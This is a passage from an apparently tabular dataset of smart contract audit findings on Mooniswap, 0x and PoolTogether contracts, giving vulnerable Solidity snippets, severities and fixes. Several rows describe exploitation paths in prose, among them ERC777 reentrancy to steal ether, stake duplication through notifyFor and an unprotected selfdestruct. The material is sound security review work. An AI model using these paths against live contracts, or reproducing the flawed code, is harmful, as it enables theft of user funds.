documentation and provide a specification that outlines how this contract is supposed to be used.\\nReview the “additional notes” provided with this issue.",,"```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n" +GovernanceMothership - notifyFor allows to arbitrarily create new or override other users stake in governance modules Unverified,high,"The `notify*` methods are called to update linked governance modules when an accounts stake changes in the Mothership. The linked modules then update their own balances of the user to accurately reflect the account's real stake in the Mothership.\\nBesides `notify` there's also a method named `notifyFor` which is publicly accessible. It is assumed that the method should be used similar to `notify` to force an update for another account's balance.\\nHowever, invoking the method forces an update in the linked modules for the provided address, but takes `balanceOf(msg.sender)` instead of `balanceOf(account)`. This allows malicious actors to:\\nArbitrarily change other accounts stake in linked governance modules (e.g. zeroing stake, increasing stake) based on the callers stake in the mothership\\nDuplicate stake out of thin air to arbitrary addresses (e.g. staking in mothership once and calling `notifyFor` many other account addresses)\\npublicly accessible method allows forcing stake updates for arbitrary users\\n```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n\\nthe method calls the linked governance modules\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nwhich will arbitrarily `mint` or `burn` stake in the `BalanceAccounting` of `Factory` or `Reward` (or other linked governance modules)\\n```\\nfunction notifyStakeChanged(address account, uint256 newBalance) external override onlyMothership {\\n \\_notifyStakeChanged(account, newBalance);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n } else {\\n return;\\n }\\n uint256 newTotalSupply = totalSupply();\\n\\n \\_defaultFee.updateBalance(account, \\_defaultFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_FEE, \\_emitDefaultFeeVoteUpdate);\\n \\_defaultSlippageFee.updateBalance(account, \\_defaultSlippageFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_SLIPPAGE\\_FEE, \\_emitDefaultSlippageFeeVoteUpdate);\\n \\_defaultDecayPeriod.updateBalance(account, \\_defaultDecayPeriod.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_DECAY\\_PERIOD, \\_emitDefaultDecayPeriodVoteUpdate);\\n \\_referralShare.updateBalance(account, \\_referralShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_REFERRAL\\_SHARE, \\_emitReferralShareVoteUpdate);\\n \\_governanceShare.updateBalance(account, \\_governanceShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_GOVERNANCE\\_SHARE, \\_emitGovernanceShareVoteUpdate);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override updateReward(account) {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n }\\n}\\n```\\n","Remove `notifyFor` or change it to take the balance of the correct account `_notifyFor(account, balanceOf(msg.sender))`.\\nIt is questionable whether the public `notify*()` family of methods is actually needed as stake should only change - and thus an update of linked modules should only be required - if an account calls `stake()` or `unstake()`. It should therefore be considered to remove `notify()`, `notifyFor` and `batchNotifyFor`.",,"```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n" +The uniTransferFrom function can potentially be used with invalid params Unverified,medium,"The system is using the `UniERC20` contract to incapsulate transfers of both ERC-20 tokens and ETH. This contract has `uniTransferFrom` function that can be used for any ERC-20 or ETH:\\n```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n require(msg.value >= amount, ""UniERC20: not enough value"");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n\\nIn case if the function is called for the normal ERC-20 token, everything works as expected. The tokens are transferred `from` the `from` address `to` the `to` address. If the token is ETH - the transfer is expected `to` be `from` the `msg.sender` `to` `this` contract. Even if the `to` and `from` parameters are different.\\nThis issue's severity is not high because the function is always called with the proper parameters in the current codebase.","Resolution\\nAccording to the client, this issue is addressed in 1inch-exchange/[email protected]d0ffb6f.\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nMake sure that the `uniTransferFrom` function is always called with expected parameters.",,"```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n require(msg.value >= amount, ""UniERC20: not enough value"");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n" +MooniswapGovernance - votingpower is not accurately reflected when minting pool tokens Unverified,medium,"When a user provides liquidity to the pool, pool-tokens are minted. The minting event triggers the `_beforeTokenTransfer` callback in `MooniswapGovernance` which updates voting power reflecting the newly minted stake for the user.\\nThere seems to be a copy-paste error in the way `balanceTo` is determined that sets `balanceTo` to zero if new token were minted (from==address(0)). This means, that in a later call to `_updateOnTransfer` only the newly minted amount is considered when adjusting voting power.\\nIf tokens are newly minted `from==address(0)` and therefore `balanceTo -> 0`.\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n\\nnow, `balanceTo` is zero which would adjust voting power to `amount` instead of the user's actual balance + the newly minted token.\\n```\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\n",`balanceTo` should be zero when burning (to == address(0)) and `balanceOf(to)` when minting.\\ne.g. like this:\\n```\\nuint256 balanceTo = (to != address(0)) ? balanceOf(to) : 0;\\n```\\n,,"```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n" +MooniswapGovernance - _beforeTokenTransfer should not update voting power on transfers to self Unverified,medium,"Mooniswap governance is based on the liquidity voting system that is also employed by the mothership or for factory governance. In contrast to traditional voting systems where users vote for discrete values, the liquidity voting system derives a continuous weighted averaged “consensus” value from all the votes. Thus it is required that whenever stake changes in the system, all the parameters that can be voted upon are updated with the new weights for a specific user.\\nThe Mooniswap pool is governed by liquidity providers and liquidity tokens are the stake that gives voting rights in `MooniswapGovernance`. Thus whenever liquidity tokens are transferred to another address, stake and voting values need to be updated. This is handled by `MooniswapGovernance._beforeTokenTransfer()`.\\nIn the special case where someone triggers a token transfer where the `from` address equals the `to` address, effectively sending the token `to` themselves, no update on voting power should be performed. Instead, voting power is first updated with `balance - amount` and then with `balance + amount` which in the worst case means it is updating first `to` a zero balance and then `to` 2x the balance.\\nUltimately this should not have an effect on the overall outcome but is unnecessary and wasting gas.\\n`beforeTokenTransfer` callback in `Mooniswap` does not check for the NOP case where `from==to`\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n\\nwhich leads to `updateBalance` being called on the same address twice, first with `currentBalance - amountTransferred` and then with `currentBalance + amountTransferred`.\\n```\\nif (params.from != address(0)) {\\n votingData.updateBalance(params.from, voteFrom, params.balanceFrom, params.balanceFrom.sub(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\n",Do not update voting power on LP token transfers where `from == to`.,,"```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n" +Unpredictable behavior for users due to admin front running or general bad timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nMooniswapFactoryGovernance - Admin opportunity to lock `swapFor` with a referral when setting an invalid `referralFeeReceiver`\\n`setReferralFeeReceiver` and `setGovernanceFeeReceiver` takes effect immediately.\\n```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n\\n`setReferralFeeReceiver` can be used to set an invalid receiver address (or one that reverts on every call) effectively rendering `Mooniswap.swapFor` unusable if a referral was specified in the swap.\\n```\\nif (referral != address(0)) {\\n referralShare = invIncrease.mul(referralShare).div(\\_FEE\\_DENOMINATOR);\\n if (referralShare > 0) {\\n if (referralFeeReceiver != address(0)) {\\n \\_mint(referralFeeReceiver, referralShare);\\n IReferralFeeReceiver(referralFeeReceiver).updateReward(referral, referralShare);\\n```\\n\\nLocking staked token\\nAt any point in time and without prior notice to users an admin may accidentally or intentionally add a broken governance sub-module to the system that blocks all users from unstaking their `1INCH` token. An admin can recover from this by removing the broken sub-module, however, with malicious intent tokens may be locked forever.\\nSince `1INCH` token gives voting power in the system, tokens are considered to hold value for other users and may be traded on exchanges. This raises concerns if tokens can be locked in a contract by one actor.\\nAn admin adds an invalid address or a malicious sub-module to the governance contract that always `reverts` on calls to `notifyStakeChanged`.\\n```\\nfunction addModule(address module) external onlyOwner {\\n require(\\_modules.add(module), ""Module already registered"");\\n emit AddModule(module);\\n}\\n```\\n\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nAdmin front-running to prevent user stake sync\\nAn admin may front-run users while staking in an attempt to prevent submodules from being notified of the stake update. This is unlikely to happen as it incurs costs for the attacker (front-back-running) to normal users but may be an interesting attack scenario to exclude a whale's stake from voting.\\nFor example, an admin may front-run `stake()` or `notoify*()` by briefly removing all governance submodules from the mothership and re-adding them after the users call succeeded. The stake-update will not be propagated to the sub-modules. A user may only detect this when they are voting (if they had no stake before) or when they actually check their stake. Such an attack might likely stay unnoticed unless someone listens for `addmodule` `removemodule` events on the contract.\\nAn admin front-runs a transaction by removing all modules and re-adding them afterwards to prevent the stake from propagating to the submodules.\\n```\\nfunction removeModule(address module) external onlyOwner {\\n require(\\_modules.remove(module), ""Module was not registered"");\\n emit RemoveModule(module);\\n}\\n```\\n\\nAdmin front-running to prevent unstake from propagating\\nAn admin may choose to front-run their own `unstake()`, temporarily removing all governance sub-modules, preventing `unstake()` from syncing the action to sub-modules while still getting their previously staked tokens out. The governance sub-modules can be re-added right after unstaking. Due to double-accounting of the stake (in governance and in every sub-module) their stake will still be exercisable in the sub-module even though it was removed from the mothership. Users can only prevent this by manually calling a state-sync on the affected account(s).","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nFurthermore, users should be guaranteed to be able to redeem their staked tokens. An entity - even though trusted - in the system should not be able to lock tokens indefinitely.",,```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n +The owner can borrow token0/token1 in the rescueFunds,low,"If some random tokens/funds are accidentally transferred to the pool, the `owner` can call the `rescueFunds` function to withdraw any funds manually:\\n```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, ""Mooniswap: access denied"");\\n require(token1.uniBalanceOf(address(this)) >= balance1, ""Mooniswap: access denied"");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, ""Mooniswap: access denied"");\\n}\\n```\\n\\nThere's no restriction on which funds the `owner` can try to withdraw and which token to call. It's theoretically possible to transfer pool tokens and then return them to the contract (e.g. in the case of ERC-777). That action would be similar to a free flash loan.",Explicitly check that the `token` is not equal to any of the pool tokens.,,"```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, ""Mooniswap: access denied"");\\n require(token1.uniBalanceOf(address(this)) >= balance1, ""Mooniswap: access denied"");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, ""Mooniswap: access denied"");\\n}\\n```\\n" +Ether temporarily held during transactions can be stolen via reentrancy,high,"The exchange proxy typically holds no ether balance, but it can temporarily hold a balance during a transaction. This balance is vulnerable to theft if the following conditions are met:\\nNo check at the end of the transaction reverts if ether goes missing,\\nreentrancy is possible during the transaction, and\\na mechanism exists to spend ether held by the exchange proxy.\\nWe found one example where these conditions are met, but it's possible that more exist.\\nExample\\n`MetaTransactionsFeature.executeMetaTransaction()` accepts ether, which is used to pay protocol fees. It's possible for less than the full amount in `msg.value` to be consumed, which is why the function uses the `refundsAttachedEth` modifier to return any remaining ether to the caller:\\n```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n\\nNotice that this modifier just returns the remaining ether balance (up to msg.value). It does not check for a specific amount of remaining ether. This meets condition (1) above.\\nIt's impossible to reenter the system with a second metatransaction because `executeMetaTransaction()` uses the modifier `nonReentrant`, but there's nothing preventing reentrancy via a different feature. We can achieve reentrancy by trading a token that uses callbacks (e.g. ERC777's hooks) during transfers. This meets condition (2).\\nTo find a full exploit, we also need a way to extract the ether held by the exchange proxy. `LiquidityProviderFeature.sellToLiquidityProvider()` provides such a mechanism. By passing `ETH_TOKEN_ADDRESS` as the `inputToken` and an address in the attacker's control as the `provider`, an attacker can transfer out any ether held by the exchange proxy. Note that `sellToLiquidityProvider()` can transfer any amount of ether, not limited to the amount sent via msg.value:\\n```\\nif (inputToken == ETH\\_TOKEN\\_ADDRESS) {\\n provider.transfer(sellAmount);\\n```\\n\\nThis meets condition (3).\\nThe full steps to exploit this vulnerability are as follows:\\nA maker/attacker signs a trade where one of the tokens will invoke a callback during the trade.\\nA taker signs a metatransaction to take this trade.\\nA relayer sends in the metatransaction, providing more ether than is necessary to pay the protocol fee. (It's unclear how likely this situation is.)\\nDuring the token callback, the attacker invokes `LiquidityProviderFeature.sellToLiquidityProvider()` to transfer the excess ether to their account.\\nThe metatransaction feature returns the remaining ether balance, which is now zero.","In general, we recommend using strict accounting of ether throughout the system. If there's ever a temporary balance, it should be accurately resolved at the end of the transaction, after any potential reentrancy opportunities.\\nFor the example we specifically found, we recommend doing strict accounting in the metatransactions feature. This means features called via a metatransaction would need to return how much ether was consumed. The metatransactions feature could then refund exactly `msg.value - `. The transaction should be reverted if this fails because it means ether went missing during the transaction.\\nWe also recommend limiting `sellToLiquidityProvider()` to only transfer up to `msg.value`. This is a form of defense in depth in case other vectors for a similar attack exist.",,"```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n" +UniswapFeature: Non-static call to ERC20.allowance(),low,"In the case where a token is possibly “greedy” (consumes all gas on failure), `UniswapFeature` makes a call to the token's `allowance()` function to check whether the user has provided a token allowance to the protocol proxy or to the `AllowanceTarget`. This call is made using `call()`, potentially allowing state-changing operations to take place before control of the execution returns to `UniswapFeature`.\\n```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n",Replace the `call()` with a `staticcall()`.,,"```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n" +UniswapFeature: Unchecked returndatasize in low-level external calls,low,"`UniswapFeature` makes a number of external calls from low-level assembly code. Two of these calls rely on the `CALL` opcode to copy the returndata to memory without checking that the call returned the expected amount of data. Because the `CALL` opcode does not zero memory if the call returns less data than expected, this can lead to usage of dirty memory under the assumption that it is data returned from the most recent call.\\nCall to `UniswapV2Pair.getReserves()`\\n```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n\\nCall to `ERC20.allowance()`\\n```\\n// Check if we have enough direct allowance by calling\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n","Instead of providing a memory range for `call()` to write returndata to, explicitly check `returndatasize()` after the call is made and then copy the data into memory using `returndatacopy()`.\\n```\\nif lt(returndatasize(), EXPECTED\\_SIZE) {\\n revert(0, 0) \\n}\\nreturndatacopy(0xC00, 0x00, EXPECTED\\_SIZE)\\n```\\n",,"```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n" +PeriodicPrizeStrategy - RNG failure can lock user funds,high,"To prevent manipulation of the `SortitionSumTree` after a requested random number enters the mempool, users are unable to withdraw funds while the strategy contract waits on a random number request between execution of `startAward()` and `completeAward()`.\\nIf an rng request fails, however, there is no way to exit this locked state. After an rng request times out, only `startAward()` can be called, which will make another rng request and re-enter the same locked state. The rng provider can also not be updated while the contract is in this state. If the rng provider fails permanently, user funds are permanently locked.\\n`requireNotLocked()` prevents transfers, deposits, or withdrawals when there is a pending award.\\n```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n\\n```\\nfunction \\_requireNotLocked() internal view {\\n uint256 currentBlock = \\_currentBlock();\\n require(rngRequest.lockBlock == 0 || currentBlock < rngRequest.lockBlock, ""PeriodicPrizeStrategy/rng-in-flight"");\\n}\\n```\\n\\n`setRngService()` reverts if there is a pending or timed-out rng request\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), ""PeriodicPrizeStrategy/rng-in-flight"");\\n```\\n","Instead of forcing the pending award phase to be re-entered in the event of an rng request time-out, provide an `exitAwardPhase()` function that ends the award phase without paying out the award. This will at least allow users to withdraw their funds in the event of a catastrophic failure of the rng service. It may also be prudent to allow the rng service to be updated in the event of an rng request time out.",,"```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n" +LootBox - Unprotected selfdestruct in proxy implementation,high,"When the `LootBoxController` is deployed, it also deploys an instance of `LootBox`. When someone calls `LootBoxController.plunder()` or `LootBoxController.executeCall()` the controller actually deploys a temporary proxy contract to a deterministic address using `create2`, then calls out to it to collect the loot.\\nThe `LootBox` implementation contract is completely unprotected, exposing all its functionality to any actor on the blockchain. The most critical functionality is actually the `LootBox.destroy()` method that calls `selfdestruct()` on the implementation contract.\\nTherefore, an unauthenticated user can `selfdestruct` the `LootBox` proxy implementation and cause the complete system to become dysfunctional. As an effect, none of the AirDrops that were delivered based on this contract will be redeemable (Note: `create2` deploy address is calculated from the current contract address and salt). Funds may be lost.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n\\n```\\n/// @notice Destroys this contract using `selfdestruct`\\n/// @param to The address to send remaining Ether to\\nfunction destroy(address payable to) external {\\n selfdestruct(to);\\n}\\n```\\n\\nnot in scope but listed for completeness\\n```\\ncontract CounterfactualAction {\\n function depositTo(address payable user, PrizePool prizePool, address output, address referrer) external {\\n IERC20 token = IERC20(prizePool.token());\\n uint256 amount = token.balanceOf(address(this));\\n token.approve(address(prizePool), amount);\\n prizePool.depositTo(user, amount, output, referrer);\\n selfdestruct(user);\\n }\\n\\n function cancel(address payable user, PrizePool prizePool) external {\\n IERC20 token = IERC20(prizePool.token());\\n token.transfer(user, token.balanceOf(address(this)));\\n selfdestruct(user);\\n }\\n```\\n",Enforce that only the deployer of the contract can call functionality in the contract. Make sure that nobody can destroy the implementation of proxy contracts.,,```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n +PeriodicPriceStrategy - trustedForwarder can impersonate any msg.sender,high,"The `trustedForwarder` undermines the trust assumptions in the system. For example, one would assume that the access control modifier `onlyPrizePool` would only allow the configured `PrizePool` to call certain methods. However, in reality, the `trustedForwarder` can assume this position as well. The same is true for the `onlyOwnerOrListener` modifier. One would assume `msg.sender` must either be `periodicPrizeStrategyListener` or `owner` (the initial deployer) while the `trustedForwarder` can assume any of the administrative roles.\\nThe centralization of power to allow one account to impersonate other components and roles (owner, `listener`, prizePool) in the system is a concern by itself and may give users pause when deciding whether to trust the contract system. The fact that the `trustedForwarder` can spoof events for any `msg.sender` may also make it hard to keep an accurate log trail of events in case of a security incident.\\nNote: The same functionality seems to be used in `ControlledToken` and other contracts which allows the `trustedForwarder` to assume any tokenholder in `ERC20UpgradeSafe`. There is practically no guarantee to `ControlledToken` holders.\\nNote: The trustedForwarder/msgSender() pattern is used in multiple contracts, many of which are not in the scope of this assessment.\\naccess control modifiers that can be impersonated\\n```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), ""PeriodicPrizeStrategy/only-prize-pool"");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyOwnerOrListener() {\\n require(\\_msgSender() == owner() || \\_msgSender() == address(periodicPrizeStrategyListener), ""PeriodicPrizeStrategy/only-owner-or-listener"");\\n \\_;\\n}\\n```\\n\\nevent `msg.sender` that can be spoofed because the actual `msg.sender` can be `trustedForwarder`\\n```\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n```\\nemit PrizePoolAwardStarted(\\_msgSender(), address(prizePool), requestId, lockBlock);\\n```\\n\\n```\\nemit PrizePoolAwarded(\\_msgSender(), randomNumber);\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n`_msgSender()` implementation allows the `trustedForwarder` to impersonate any `msg.sender` address\\n```\\n/// @dev Provides information about the current execution context for GSN Meta-Txs.\\n/// @return The payable address of the message sender\\nfunction \\_msgSender()\\n internal\\n override(BaseRelayRecipient, ContextUpgradeSafe)\\n virtual\\n view\\n returns (address payable)\\n{\\n return BaseRelayRecipient.\\_msgSender();\\n}\\n```\\n",Remove the `trustedForwarder` or restrict the type of actions the forwarder can perform and don't allow it to impersonate other components in the system. Make sure users understand the trust assumptions and who has what powers in the system. Make sure to keep an accurate log trail of who performed which action on whom's behalf.,,"```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), ""PeriodicPrizeStrategy/only-prize-pool"");\\n \\_;\\n}\\n```\\n" +Unpredictable behavior for users due to admin front running or general bad timing,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nAn administrator (deployer) of `MultipleWinners` can change the number of winners in the system without warning. This has the potential to violate a security goal of the system.\\nadmin can change the number of winners during a prize-draw period\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may switch-out RNG service at any time (when RNG is not in inflight or timed-out)\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), ""PeriodicPrizeStrategy/rng-in-flight"");\\n\\n rng = rngService;\\n emit RngServiceUpdated(address(rngService));\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin can effectively disable the rng request timeout by setting a high value during a prize-draw (e.g. to indefinitely block payouts)\\n```\\nfunction setRngRequestTimeout(uint32 \\_rngRequestTimeout) external onlyOwner {\\n \\_setRngRequestTimeout(\\_rngRequestTimeout);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may set new tokenListener which might intentionally block token-transfers\\n```\\nfunction setTokenListener(TokenListenerInterface \\_tokenListener) external onlyOwner {\\n tokenListener = \\_tokenListener;\\n\\n emit TokenListenerUpdated(address(tokenListener));\\n}\\n```\\n\\n```\\nfunction setPeriodicPrizeStrategyListener(address \\_periodicPrizeStrategyListener) external onlyOwner {\\n periodicPrizeStrategyListener = PeriodicPrizeStrategyListener(\\_periodicPrizeStrategyListener);\\n\\n emit PeriodicPrizeStrategyListenerSet(\\_periodicPrizeStrategyListener);\\n}\\n```\\n\\nout of scope but mentioned as a relevant example: `PrizePool` owner can set new `PrizeStrategy` at any time\\n```\\n/// @notice Sets the prize strategy of the prize pool. Only callable by the owner.\\n/// @param \\_prizeStrategy The new prize strategy\\nfunction setPrizeStrategy(address \\_prizeStrategy) external override onlyOwner {\\n \\_setPrizeStrategy(TokenListenerInterface(\\_prizeStrategy));\\n}\\n```\\n\\na malicious admin may remove all external 